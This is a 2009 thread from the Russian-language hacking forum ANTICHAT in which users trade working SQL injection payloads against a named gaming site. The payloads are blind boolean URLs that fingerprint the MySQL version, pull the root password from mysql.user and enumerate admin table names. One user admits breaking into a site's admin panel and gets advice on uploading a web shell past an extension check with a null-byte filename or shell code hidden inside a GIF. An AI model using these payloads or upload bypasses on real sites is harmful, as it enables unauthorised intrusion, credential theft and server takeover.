ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
11.01.2009, 15:54
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980
Репутация:
930
|
|
Сообщение от wildshaman
Гм, интеренсо...
А продробней не расскажешь, как определял - какие промежуточные действия были до hand+substring(@@version,1,1)=5
вот имеется наш урл:
Код:
http://www.check6gaming.com/news.php?id=67
для теста на inj проверяем
Код:
http://www.check6gaming.com/news.php?id=67+and+1=1
выводится тот же запрос,что и при id=67
определяем версию:
substring(@@version,1,1)=4
первый символ сравниваем с 4, если 4 версия то отобразиться такая же странцица как и при id=67
наконец запрос
Код:
http://www.check6gaming.com/news.php?id=67+and+substring(@@version,1,1)=5
не выдает ошибки, соответственно версия мускула = 5
Последний раз редактировалось z00MAN; 11.01.2009 в 15:56..
|
|
|
11.01.2009, 16:00
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Сообщение от z00MAN
вот имеется наш урл:
Код:
http://www.check6gaming.com/news.php?id=67
для теста на inj проверяем
Код:
http://www.check6gaming.com/news.php?id=67+and+1=1
выводится тот же запрос,что и при id=67
определяем версию:
substring(@@version,1,1)=4
первый символ сравниваем с 4, если 4 версия то отобразиться такая же странцица как и при id=67
наконец запрос
Код:
http://www.check6gaming.com/news.php?id=67+and+substring(@@version,1,1)=5
не выдает ошибки, соответственно версия мускула = 5 Хех, спасибо =)
Как бы еще количество столбцов...
|
|
|
|
11.01.2009, 15:49
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678
Репутация:
354
|
|
wildshaman
Использовал подзапросы, посимвольный перебор
читай _www.abc-it.lv/index.php/id/715
промежуточные действия
substring(@@version,1,1)=3
substring(@@version,1,1)=4
substring(@@version,1,1)=5
5 возвращает true. Значит версия пятая.
Так же можешь перебрать user,database и т.д.
|
|
|
|
11.01.2009, 16:17
|
|
Новичок
Регистрация: 11.01.2009
Сообщений: 15
Провел на форуме:
8148
Репутация:
13
|
|
хай
Есть скуль на сайте
база MSSQL
ввожу
index.cfm?page=search&searchstring=111-222-1933email@address.tst&searchtype=@@version или (select+system_user)
все нормально выводит
но как только пытаюсь вывести имена таблиц, страница просто перезагружается, не каких ошибок и прочего 
В чем трабла? как вывести имена таблиц и колонок? |
|
|
|
11.01.2009, 16:25
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
2 wildshaman:
http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((SELECT+p assword+from+mysql.user+WHERE+user='root'),1,1)))
А таблицы можешь так подбирать:
http://www.check6gaming.com/admin.php?name=67+AND+ascii(lower(substring(CONCAT _WS(0x3a,(select+name+from+admin+LIMIT+0,1),(selec t+name+from+admin+LIMIT+1,1),(select+name+from+adm in+LIMIT+2,1)),1,1)))=97
Последний раз редактировалось Pashkela; 11.01.2009 в 16:39..
|
|
|
|
11.01.2009, 17:09
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Сообщение от Pashkela
2 wildshaman:
http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((SELECT+p assword+from+mysql.user+WHERE+user='root'),1,1)))
А таблицы можешь так подбирать:
http://www.check6gaming.com/admin.php?name=67+AND+ascii(lower(substring(CONCAT _WS(0x3a,(select+name+from+admin+LIMIT+0,1),(selec t+name+from+admin+LIMIT+1,1),(select+name+from+adm in+LIMIT+2,1)),1,1)))=97
спс, но во втором случае пишед ошибку 404 нот фаунд (пробелы убрал), а в первом - SELECT command denied to user 'check6ga_root'@'localhost' for table 'user' =(
|
|
|
|
11.01.2009, 17:12
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463
Репутация:
97
|
|
Взломал сайт, получил доступ в админку, пытаюсь залить шелл-проверяется расширение файла (только jpg or gif)
file_priv отключён, доступа к mysql.user нет, только в админку.
Думается, что shell.php.jpg заливать смысла нет ))... Как быть?
Подскажите плз. Слышал, кто то говорил что как то проинклудить можно. В общем поделитесь соображениями и опытом.
|
|
|
|
11.01.2009, 17:31
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
Сообщение от Imperou$
Взломал сайт, получил доступ в админку, пытаюсь залить шелл-проверяется расширение файла (только jpg or gif)
file_priv отключён, доступа к mysql.user нет, только в админку.
Думается, что shell.php.jpg заливать смысла нет ))... Как быть?
Подскажите плз. Слышал, кто то говорил что как то проинклудить можно. В общем поделитесь соображениями и опытом.
Если проверяеться только расширения, но не сам факт что это картинка попробуй null байт, shell.php%00.jpg, если проверяеться сам факт что это картинка, то запихни в маленку картинку, например в .gif код шелла, и посмотри что бы валидно открывалась картинка и попробуй то же самое, а вообше че за админка? Паблик движок или самопис?
|
|
|
|
11.01.2009, 17:22
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
2 wildshaman:
http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring(CONCAT_WS (0x3a,(select+id+from+admin+LIMIT+0,1),(select+id+ from+admin+LIMIT+1,1),(select+id+from+admin+LIMIT+ 2,1)),1,1)))=97
|
|
|
|
11.01.2009, 17:38
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Pashkela
2 wildshaman:
http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring(CONCAT_WS (0x3a,(select+id+from+admin+LIMIT+0,1),(select+id+ from+admin+LIMIT+1,1),(select+id+from+admin+LIMIT+ 2,1)),1,1)))=97
Это ты показал какие ибические конструкции можно делать , или как? Помоему к сайту это не имеет никакого отношения, и он достаточно ясно об этом сообщает 
2 wildshaman
Смотри запрос который дал R1dex на предыдущей странице
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид